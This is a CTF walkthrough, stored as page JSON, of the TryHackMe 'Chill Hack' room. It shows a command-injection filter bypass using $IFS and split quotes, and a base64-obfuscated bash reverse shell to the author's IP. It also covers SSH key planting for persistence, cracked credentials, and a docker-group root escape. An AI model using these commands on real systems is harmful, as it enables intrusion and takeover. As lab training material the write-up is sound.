[{"data":1,"prerenderedAt":1053},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-chillhack-writeup":3,"surround-\u002F2025\u002Ftryhackme-chillhack-writeup":1044},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":6,"draft":6,"readingTime":14,"body":19,"_type":1037,"_id":1038,"_source":1039,"_file":1040,"_stem":1041,"_extension":1042,"_original_dir":1043},"\u002F2025\u002Ftryhackme-chillhack-writeup","2025",false,"","TryHackMe - Chill Hack","A step-by-step walkthrough for the TryHackMe 'Chill Hack' room. This guide covers the entire process from initial reconnaissance and exploiting a command injection vulnerability to escalating privileges to root.","2025-08-28T11:03:29.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002Fthumbnail.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"4 min read",3.79,227400,758,{"type":20,"children":21,"toc":1025},"root",[22,28,44,51,55,72,76,80,84,114,118,131,135,149,153,159,180,184,197,261,265,270,274,280,287,316,320,333,337,370,401,405,425,512,517,521,527,545,549,554,558,572,576,589,593,620,624,629,633,646,668,681,720,724,753,758,762,766,771,775,787,791,796,800,812,816,829,833,838,842,878,882,886,898,902,908,952,1011,1015,1019],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: ",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fchillhack",[40],"nofollow",[42],{"type":33,"value":43},"10.10.92.214",{"type":23,"tag":45,"props":46,"children":48},"h2",{"id":47},"reconnaissance",[49],{"type":33,"value":50},"Reconnaissance",{"type":23,"tag":24,"props":52,"children":54},{"src":53},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F1.jpg",[],{"type":23,"tag":29,"props":56,"children":57},{},[58,60,70],{"type":33,"value":59},"We have an FTP server with ",{"type":23,"tag":61,"props":62,"children":67},"code",{"className":63,"id":65,"style":66},[64],"example-info","just-like-this","color: #efb11d",[68],{"type":33,"value":69},"anonymous",{"type":33,"value":71}," access, one SSH server, and one web server. Let's examine these and see what we can find.",{"type":23,"tag":24,"props":73,"children":75},{"src":74},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F3.jpg",[],{"type":23,"tag":24,"props":77,"children":79},{"src":78},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F4.jpg",[],{"type":23,"tag":24,"props":81,"children":83},{"src":82},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":85,"children":86},{},[87,89,96,98,104,106,112],{"type":33,"value":88},"And we find the names ",{"type":23,"tag":61,"props":90,"children":93},{"className":91,"id":65,"style":92},[64],"color: #4DFFBE",[94],{"type":33,"value":95},"Anurodh",{"type":33,"value":97}," and ",{"type":23,"tag":61,"props":99,"children":101},{"className":100,"id":65,"style":92},[64],[102],{"type":33,"value":103},"Apaar",{"type":33,"value":105}," on our ",{"type":23,"tag":61,"props":107,"children":109},{"className":108},[],[110],{"type":33,"value":111},"ftp",{"type":33,"value":113}," server. These may be useful later on. Now let's perform a directory scan on the web server for more information.",{"type":23,"tag":24,"props":115,"children":117},{"src":116},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F6.jpg",[],{"type":23,"tag":29,"props":119,"children":120},{},[121,123,129],{"type":33,"value":122},"And we found the ",{"type":23,"tag":61,"props":124,"children":126},{"className":125,"id":65,"style":66},[64],[127],{"type":33,"value":128},"\u002Fsecret",{"type":33,"value":130}," directory.",{"type":23,"tag":24,"props":132,"children":134},{"src":133},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F7.jpg",[],{"type":23,"tag":29,"props":136,"children":137},{},[138,140,147],{"type":33,"value":139},"Now we encounter a page that examines and executes the commands we have given here. Here, we first try the ",{"type":23,"tag":61,"props":141,"children":144},{"className":142,"id":65,"style":143},[64],"color: #EA5B6F",[145],{"type":33,"value":146},"ls -la",{"type":33,"value":148}," command, and the filtering system understands us and does not carry out our operation.",{"type":23,"tag":24,"props":150,"children":152},{"src":151},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F8.jpg",[],{"type":23,"tag":45,"props":154,"children":156},{"id":155},"initial-access",[157],{"type":33,"value":158},"Initial Access",{"type":23,"tag":29,"props":160,"children":161},{},[162,164,170,172,178],{"type":33,"value":163},"Now we need to understand what kind of filtering is happening. Let's send the command ",{"type":23,"tag":61,"props":165,"children":167},{"className":166,"id":65,"style":92},[64],[168],{"type":33,"value":169},"ls$IFS-la",{"type":33,"value":171},", which serves the same purpose, and look at the result. Here we used $IFS (Internal Field Separator). ",{"type":23,"tag":61,"props":173,"children":175},{"className":174},[],[176],{"type":33,"value":177},"$IFS",{"type":33,"value":179}," represents characters such as space, tab, and newline in the shell.",{"type":23,"tag":24,"props":181,"children":183},{"src":182},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F9.jpg",[],{"type":23,"tag":29,"props":185,"children":186},{},[187,189,195],{"type":33,"value":188},"And our command worked. We can run commands on the system using filter bypass techniques. So let's check for the existence of BASE64. And we found that it is installed. Then we can encode our shell with base64 using ",{"type":23,"tag":36,"props":190,"children":193},{"href":191,"rel":192},"https:\u002F\u002Fwww.revshells.com\u002F",[40],[194],{"type":33,"value":191},{"type":33,"value":196}," and then run it using filter bypass. As a result, our code is as follows.",{"type":23,"tag":198,"props":199,"children":203},"pre",{"className":200,"code":201,"language":202,"meta":7,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","'e'c'h'o \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMS4yNTEuMTYzLzgwODAgMD4mMQ==\" | base64$IFS-d|bash\n","bash",[204],{"type":23,"tag":61,"props":205,"children":206},{"__ignoreMap":7},[207],{"type":23,"tag":208,"props":209,"children":212},"span",{"class":210,"line":211},"line",1,[213,219,224,229,234,240,246,251,256],{"type":23,"tag":208,"props":214,"children":216},{"style":215},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[217],{"type":33,"value":218},"'e'",{"type":23,"tag":208,"props":220,"children":221},{"style":215},[222],{"type":33,"value":223},"c",{"type":23,"tag":208,"props":225,"children":226},{"style":215},[227],{"type":33,"value":228},"'h'",{"type":23,"tag":208,"props":230,"children":231},{"style":215},[232],{"type":33,"value":233},"o",{"type":23,"tag":208,"props":235,"children":237},{"style":236},"--shiki-default:#40A02B;--shiki-dark:#98C379",[238],{"type":33,"value":239}," \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMS4yNTEuMTYzLzgwODAgMD4mMQ==\"",{"type":23,"tag":208,"props":241,"children":243},{"style":242},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[244],{"type":33,"value":245}," |",{"type":23,"tag":208,"props":247,"children":248},{"style":215},[249],{"type":33,"value":250}," base64$IFS-d",{"type":23,"tag":208,"props":252,"children":253},{"style":242},[254],{"type":33,"value":255},"|",{"type":23,"tag":208,"props":257,"children":258},{"style":215},[259],{"type":33,"value":260},"bash\n",{"type":23,"tag":24,"props":262,"children":264},{"src":263},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F10.jpg",[],{"type":23,"tag":29,"props":266,"children":267},{},[268],{"type":33,"value":269},"Now let's listen for the port of our shell on our local device and enter the command we set in the command section and press execute.",{"type":23,"tag":24,"props":271,"children":273},{"src":272},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F11.jpg",[],{"type":23,"tag":45,"props":275,"children":277},{"id":276},"privilege-escalation",[278],{"type":33,"value":279},"Privilege Escalation",{"type":23,"tag":281,"props":282,"children":284},"h3",{"id":283},"www-data-apaar",[285],{"type":33,"value":286},"www-data -> apaar",{"type":23,"tag":29,"props":288,"children":289},{},[290,292,298,300,306,308,314],{"type":33,"value":291},"With a simple command, we saw that the ",{"type":23,"tag":61,"props":293,"children":295},{"className":294},[],[296],{"type":33,"value":297},"www-data",{"type":33,"value":299}," user can run the ",{"type":23,"tag":61,"props":301,"children":303},{"className":302,"id":65,"style":92},[64],[304],{"type":33,"value":305},"\u002Fhome\u002Fapaar\u002F.helpline.sh",{"type":33,"value":307}," command with ",{"type":23,"tag":61,"props":309,"children":311},{"className":310},[],[312],{"type":33,"value":313},"apaar",{"type":33,"value":315}," privileges without needing a password.",{"type":23,"tag":24,"props":317,"children":319},{"src":318},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F12.jpg",[],{"type":23,"tag":29,"props":321,"children":322},{},[323,325,331],{"type":33,"value":324},"When we examine this file, the ",{"type":23,"tag":61,"props":326,"children":328},{"className":327,"id":65,"style":92},[64],[329],{"type":33,"value":330},"$msg 2>\u002Fdev\u002Fnull",{"type":33,"value":332}," part catches our attention. We can write and execute our command here.",{"type":23,"tag":24,"props":334,"children":336},{"src":335},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F13.jpg",[],{"type":23,"tag":29,"props":338,"children":339},{},[340,342,347,349,354,356,361,363,368],{"type":33,"value":341},"So, let's run this file with ",{"type":23,"tag":61,"props":343,"children":345},{"className":344},[],[346],{"type":33,"value":313},{"type":33,"value":348}," privileges to open a ",{"type":23,"tag":61,"props":350,"children":352},{"className":351},[],[353],{"type":33,"value":202},{"type":33,"value":355}," shell, and in this way, switch from the ",{"type":23,"tag":61,"props":357,"children":359},{"className":358},[],[360],{"type":33,"value":297},{"type":33,"value":362}," user to the ",{"type":23,"tag":61,"props":364,"children":366},{"className":365},[],[367],{"type":33,"value":313},{"type":33,"value":369}," user.",{"type":23,"tag":198,"props":371,"children":373},{"className":200,"code":372,"language":202,"meta":7,"style":7},"sudo -u apaar \u002Fhome\u002Fapaar\u002F.helpline.sh\n",[374],{"type":23,"tag":61,"props":375,"children":376},{"__ignoreMap":7},[377],{"type":23,"tag":208,"props":378,"children":379},{"class":210,"line":211},[380,385,391,396],{"type":23,"tag":208,"props":381,"children":382},{"style":215},[383],{"type":33,"value":384},"sudo",{"type":23,"tag":208,"props":386,"children":388},{"style":387},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[389],{"type":33,"value":390}," -u",{"type":23,"tag":208,"props":392,"children":393},{"style":236},[394],{"type":33,"value":395}," apaar",{"type":23,"tag":208,"props":397,"children":398},{"style":236},[399],{"type":33,"value":400}," \u002Fhome\u002Fapaar\u002F.helpline.sh\n",{"type":23,"tag":24,"props":402,"children":404},{"src":403},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F14.jpg",[],{"type":23,"tag":29,"props":406,"children":407},{},[408,410,415,417,423],{"type":33,"value":409},"For a more stable and persistent shell, let's add our own key to the ",{"type":23,"tag":61,"props":411,"children":413},{"className":412},[],[414],{"type":33,"value":313},{"type":33,"value":416}," user's ",{"type":23,"tag":61,"props":418,"children":420},{"className":419},[],[421],{"type":33,"value":422},".ssh\u002Fauthorized_keys",{"type":33,"value":424}," file.",{"type":23,"tag":426,"props":427,"children":428},"ol",{},[429,447],{"type":23,"tag":430,"props":431,"children":432},"li",{},[433,435,441,443],{"type":33,"value":434},"Let's create a key on our own device with ",{"type":23,"tag":61,"props":436,"children":438},{"className":437},[],[439],{"type":33,"value":440},"ssh-keygen",{"type":33,"value":442},".",{"type":23,"tag":24,"props":444,"children":446},{"src":445},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F15.jpg",[],{"type":23,"tag":430,"props":448,"children":449},{},[450,452,458,460,465,466,471,473,504,508],{"type":33,"value":451},"Then, let's add our ",{"type":23,"tag":61,"props":453,"children":455},{"className":454},[],[456],{"type":33,"value":457},"appar.pub",{"type":33,"value":459}," content to the ",{"type":23,"tag":61,"props":461,"children":463},{"className":462},[],[464],{"type":33,"value":313},{"type":33,"value":416},{"type":23,"tag":61,"props":467,"children":469},{"className":468},[],[470],{"type":33,"value":422},{"type":33,"value":472}," file on the target system with the following command.",{"type":23,"tag":198,"props":474,"children":476},{"className":200,"code":475,"language":202,"meta":7,"style":7},"echo \"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFutMI1FBM4G1PA27iJaJ4ABqCWFL3mch4pIvSO6hqJv xeloxa@kali\" > authorized_keys\n",[477],{"type":23,"tag":61,"props":478,"children":479},{"__ignoreMap":7},[480],{"type":23,"tag":208,"props":481,"children":482},{"class":210,"line":211},[483,489,494,499],{"type":23,"tag":208,"props":484,"children":486},{"style":485},"--shiki-default:#D20F39;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[487],{"type":33,"value":488},"echo",{"type":23,"tag":208,"props":490,"children":491},{"style":236},[492],{"type":33,"value":493}," \"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFutMI1FBM4G1PA27iJaJ4ABqCWFL3mch4pIvSO6hqJv xeloxa@kali\"",{"type":23,"tag":208,"props":495,"children":496},{"style":242},[497],{"type":33,"value":498}," >",{"type":23,"tag":208,"props":500,"children":501},{"style":236},[502],{"type":33,"value":503}," authorized_keys\n",{"type":23,"tag":24,"props":505,"children":507},{"src":506},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F16.jpg",[],{"type":23,"tag":24,"props":509,"children":511},{"src":510},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F17.jpg",[],{"type":23,"tag":29,"props":513,"children":514},{},[515],{"type":33,"value":516},"Now let's open a clean shell with our key.",{"type":23,"tag":24,"props":518,"children":520},{"src":519},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F18.jpg",[],{"type":23,"tag":281,"props":522,"children":524},{"id":523},"apaar-anurodh",[525],{"type":33,"value":526},"apaar -> anurodh",{"type":23,"tag":29,"props":528,"children":529},{},[530,532,543],{"type":33,"value":531},"Now, let's search for possible scenarios to escalate our privileges using the ",{"type":23,"tag":36,"props":533,"children":536},{"href":534,"rel":535},"https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Ftree\u002Fmaster\u002FlinPEAS",[40],[537],{"type":23,"tag":61,"props":538,"children":540},{"className":539},[],[541],{"type":33,"value":542},"linpeas.sh",{"type":33,"value":544}," tool. (I placed this script on my own apache server and downloaded it on the target with wget.)",{"type":23,"tag":24,"props":546,"children":548},{"src":547},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F19.jpg",[],{"type":23,"tag":29,"props":550,"children":551},{},[552],{"type":33,"value":553},"And some of the results caught our attention.",{"type":23,"tag":24,"props":555,"children":557},{"src":556},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F20.jpg",[],{"type":23,"tag":29,"props":559,"children":560},{},[561,563,570],{"type":33,"value":562},"The ",{"type":23,"tag":61,"props":564,"children":567},{"className":565,"id":65,"style":566},[64],"color: #77BEF0",[568],{"type":33,"value":569},"\u002Fusr\u002Fbin\u002Fdocker",{"type":33,"value":571}," software might be interesting.",{"type":23,"tag":24,"props":573,"children":575},{"src":574},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F21.jpg",[],{"type":23,"tag":29,"props":577,"children":578},{},[579,581,587],{"type":33,"value":580},"Ports that are open to localhost but closed to the internet. The ",{"type":23,"tag":61,"props":582,"children":584},{"className":583},[],[585],{"type":33,"value":586},"127.0.0.1",{"type":33,"value":588}," address means that this service is closed to external (internet) access and can only be reached from the server itself.",{"type":23,"tag":24,"props":590,"children":592},{"src":591},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F22.jpg",[],{"type":23,"tag":29,"props":594,"children":595},{},[596,597,603,605,611,613,619],{"type":33,"value":562},{"type":23,"tag":61,"props":598,"children":600},{"className":599},[],[601],{"type":33,"value":602},"php",{"type":33,"value":604}," files in the ",{"type":23,"tag":61,"props":606,"children":608},{"className":607,"id":65,"style":566},[64],[609],{"type":33,"value":610},"\u002Fvar\u002Fwww\u002Ffiles",{"type":33,"value":612}," path. So let's start from here. When we examine the files, we see exposed database credentials in the ",{"type":23,"tag":61,"props":614,"children":616},{"className":615,"id":65,"style":92},[64],[617],{"type":33,"value":618},"index.php",{"type":33,"value":424},{"type":23,"tag":24,"props":621,"children":623},{"src":622},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F23.jpg",[],{"type":23,"tag":29,"props":625,"children":626},{},[627],{"type":33,"value":628},"Now let's investigate the database with this information.",{"type":23,"tag":24,"props":630,"children":632},{"src":631},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F24.jpg",[],{"type":23,"tag":29,"props":634,"children":635},{},[636,638,644],{"type":33,"value":637},"And we find two users and their hashed passwords. Let's crack these hashes using ",{"type":23,"tag":36,"props":639,"children":642},{"href":640,"rel":641},"https:\u002F\u002Fcrackstation.net\u002F",[40],[643],{"type":33,"value":640},{"type":33,"value":645},". As a result, we get the following pairs.",{"type":23,"tag":647,"props":648,"children":649},"ul",{},[650,659],{"type":23,"tag":430,"props":651,"children":652},{},[653],{"type":23,"tag":61,"props":654,"children":656},{"className":655,"id":65,"style":92},[64],[657],{"type":33,"value":658},"anurodh:masterpassword",{"type":23,"tag":430,"props":660,"children":661},{},[662],{"type":23,"tag":61,"props":663,"children":665},{"className":664,"id":65,"style":92},[64],[666],{"type":33,"value":667},"apaar:dontaskdonttell",{"type":23,"tag":29,"props":669,"children":670},{},[671,673,679],{"type":33,"value":672},"Now we need to find the login page where we will use this information. If you recall, we previously found three ports that were only accessible locally. Now let's forward the ",{"type":23,"tag":61,"props":674,"children":676},{"className":675},[],[677],{"type":33,"value":678},"9001",{"type":33,"value":680}," port here locally with ssh.",{"type":23,"tag":198,"props":682,"children":684},{"className":200,"code":683,"language":202,"meta":7,"style":7},"ssh -L 9001:127.0.0.1:9001 -i apaar apaar@10.10.92.214\n",[685],{"type":23,"tag":61,"props":686,"children":687},{"__ignoreMap":7},[688],{"type":23,"tag":208,"props":689,"children":690},{"class":210,"line":211},[691,696,701,706,711,715],{"type":23,"tag":208,"props":692,"children":693},{"style":215},[694],{"type":33,"value":695},"ssh",{"type":23,"tag":208,"props":697,"children":698},{"style":387},[699],{"type":33,"value":700}," -L",{"type":23,"tag":208,"props":702,"children":703},{"style":236},[704],{"type":33,"value":705}," 9001:127.0.0.1:9001",{"type":23,"tag":208,"props":707,"children":708},{"style":387},[709],{"type":33,"value":710}," -i",{"type":23,"tag":208,"props":712,"children":713},{"style":236},[714],{"type":33,"value":395},{"type":23,"tag":208,"props":716,"children":717},{"style":236},[718],{"type":33,"value":719}," apaar@10.10.92.214\n",{"type":23,"tag":24,"props":721,"children":723},{"src":722},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F25.jpg",[],{"type":23,"tag":725,"props":726,"children":728},"alert",{"type":727},"info",[729,733],{"type":23,"tag":730,"props":731,"children":732},"template",{"v-slot:title":7},[],{"type":23,"tag":29,"props":734,"children":735},{},[736,738,743,745,751],{"type":33,"value":737},"This command allows us to securely access a service running on the remote server with the IP address ",{"type":23,"tag":61,"props":739,"children":741},{"className":740},[],[742],{"type":33,"value":43},{"type":33,"value":744}," that is only accessible from the server itself (i.e., running on ",{"type":23,"tag":61,"props":746,"children":748},{"className":747},[],[749],{"type":33,"value":750},"127.0.0.1:9001",{"type":33,"value":752},"). It will take any connection coming to port 9001 on our machine, securely transport it to the remote server, and forward it to the server's own internal port 9001.",{"type":23,"tag":29,"props":754,"children":755},{},[756],{"type":33,"value":757},"Let's check.",{"type":23,"tag":24,"props":759,"children":761},{"src":760},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F26.jpg",[],{"type":23,"tag":24,"props":763,"children":765},{"src":764},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F27.jpg",[],{"type":23,"tag":29,"props":767,"children":768},{},[769],{"type":33,"value":770},"As you can see, a web server is running on this port. And when we inspect it, our login page is here.",{"type":23,"tag":24,"props":772,"children":774},{"src":773},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F28.jpg",[],{"type":23,"tag":29,"props":776,"children":777},{},[778,780,785],{"type":33,"value":779},"Now let's log in with the ",{"type":23,"tag":61,"props":781,"children":783},{"className":782},[],[784],{"type":33,"value":658},{"type":33,"value":786}," information we found from the database.",{"type":23,"tag":24,"props":788,"children":790},{"src":789},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F29.jpg",[],{"type":23,"tag":29,"props":792,"children":793},{},[794],{"type":33,"value":795},"Nothing immediately stands out on the page. We examine the source code but find nothing of interest. Therefore, let's inspect the image on the site; it might be hiding something.",{"type":23,"tag":24,"props":797,"children":799},{"src":798},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F30.jpg",[],{"type":23,"tag":29,"props":801,"children":802},{},[803,805,811],{"type":33,"value":804},"Now let's download this image and check if there is data inside it with ",{"type":23,"tag":61,"props":806,"children":808},{"className":807},[],[809],{"type":33,"value":810},"steghide extract -sf \u003Cimage>",{"type":33,"value":442},{"type":23,"tag":24,"props":813,"children":815},{"src":814},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F31.jpg",[],{"type":23,"tag":29,"props":817,"children":818},{},[819,821,827],{"type":33,"value":820},"And yes, it gave us a file named ",{"type":23,"tag":61,"props":822,"children":824},{"className":823},[],[825],{"type":33,"value":826},"backup.zip",{"type":33,"value":828},". Now let's open this file.",{"type":23,"tag":24,"props":830,"children":832},{"src":831},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F32.jpg",[],{"type":23,"tag":29,"props":834,"children":835},{},[836],{"type":33,"value":837},"And the zip has a password. However, we can easily crack it with John the Ripper.",{"type":23,"tag":24,"props":839,"children":841},{"src":840},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F33.jpg",[],{"type":23,"tag":29,"props":843,"children":844},{},[845,847,853,855,861,863,869,871,877],{"type":33,"value":846},"And we find the password ",{"type":23,"tag":61,"props":848,"children":850},{"className":849},[],[851],{"type":33,"value":852},"pass1word",{"type":33,"value":854},". Inside the zip, we find a file named ",{"type":23,"tag":61,"props":856,"children":858},{"className":857},[],[859],{"type":33,"value":860},"source_code.php",{"type":33,"value":862},". When we examine this, we get a hash encoded with ",{"type":23,"tag":61,"props":864,"children":866},{"className":865},[],[867],{"type":33,"value":868},"base64",{"type":33,"value":870},". When we decode this, we get the password for the ",{"type":23,"tag":61,"props":872,"children":874},{"className":873},[],[875],{"type":33,"value":876},"anurodh",{"type":33,"value":369},{"type":23,"tag":24,"props":879,"children":881},{"src":880},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F34.jpg",[],{"type":23,"tag":24,"props":883,"children":885},{"src":884},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F35.jpg",[],{"type":23,"tag":29,"props":887,"children":888},{},[889,891,897],{"type":33,"value":890},"Now let's switch to the anurodh user with ",{"type":23,"tag":61,"props":892,"children":894},{"className":893},[],[895],{"type":33,"value":896},"su anurodh",{"type":33,"value":442},{"type":23,"tag":24,"props":899,"children":901},{"src":900},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F36.jpg",[],{"type":23,"tag":281,"props":903,"children":905},{"id":904},"anurodh-root",[906],{"type":33,"value":907},"anurodh -> root",{"type":23,"tag":29,"props":909,"children":910},{},[911,913,918,920,926,928,933,935,941,943,950],{"type":33,"value":912},"Now, as we saw from the ",{"type":23,"tag":61,"props":914,"children":916},{"className":915},[],[917],{"type":33,"value":542},{"type":33,"value":919}," output and as we check again with the ",{"type":23,"tag":61,"props":921,"children":923},{"className":922},[],[924],{"type":33,"value":925},"id",{"type":33,"value":927}," command, the ",{"type":23,"tag":61,"props":929,"children":931},{"className":930},[],[932],{"type":33,"value":876},{"type":33,"value":934}," user is in the ",{"type":23,"tag":61,"props":936,"children":938},{"className":937},[],[939],{"type":33,"value":940},"docker",{"type":33,"value":942}," group. In this case, let's look at how we can escalate our privileges via ",{"type":23,"tag":36,"props":944,"children":947},{"href":945,"rel":946},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fdocker\u002F",[40],[948],{"type":33,"value":949},"GTFObins",{"type":33,"value":951},". After checking, we see that we can become root with the following command.",{"type":23,"tag":198,"props":953,"children":955},{"className":200,"code":954,"language":202,"meta":7,"style":7},"docker run -v \u002F:\u002Fmnt --rm -it alpine chroot \u002Fmnt sh\n",[956],{"type":23,"tag":61,"props":957,"children":958},{"__ignoreMap":7},[959],{"type":23,"tag":208,"props":960,"children":961},{"class":210,"line":211},[962,966,971,976,981,986,991,996,1001,1006],{"type":23,"tag":208,"props":963,"children":964},{"style":215},[965],{"type":33,"value":940},{"type":23,"tag":208,"props":967,"children":968},{"style":236},[969],{"type":33,"value":970}," run",{"type":23,"tag":208,"props":972,"children":973},{"style":387},[974],{"type":33,"value":975}," -v",{"type":23,"tag":208,"props":977,"children":978},{"style":236},[979],{"type":33,"value":980}," \u002F:\u002Fmnt",{"type":23,"tag":208,"props":982,"children":983},{"style":387},[984],{"type":33,"value":985}," --rm",{"type":23,"tag":208,"props":987,"children":988},{"style":387},[989],{"type":33,"value":990}," -it",{"type":23,"tag":208,"props":992,"children":993},{"style":236},[994],{"type":33,"value":995}," alpine",{"type":23,"tag":208,"props":997,"children":998},{"style":236},[999],{"type":33,"value":1000}," chroot",{"type":23,"tag":208,"props":1002,"children":1003},{"style":236},[1004],{"type":33,"value":1005}," \u002Fmnt",{"type":23,"tag":208,"props":1007,"children":1008},{"style":236},[1009],{"type":33,"value":1010}," sh\n",{"type":23,"tag":24,"props":1012,"children":1014},{"src":1013},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F38.jpg",[],{"type":23,"tag":24,"props":1016,"children":1018},{"src":1017},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-chillhack-writeup\u002F37.jpg",[],{"type":23,"tag":1020,"props":1021,"children":1022},"style",{},[1023],{"type":33,"value":1024},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: 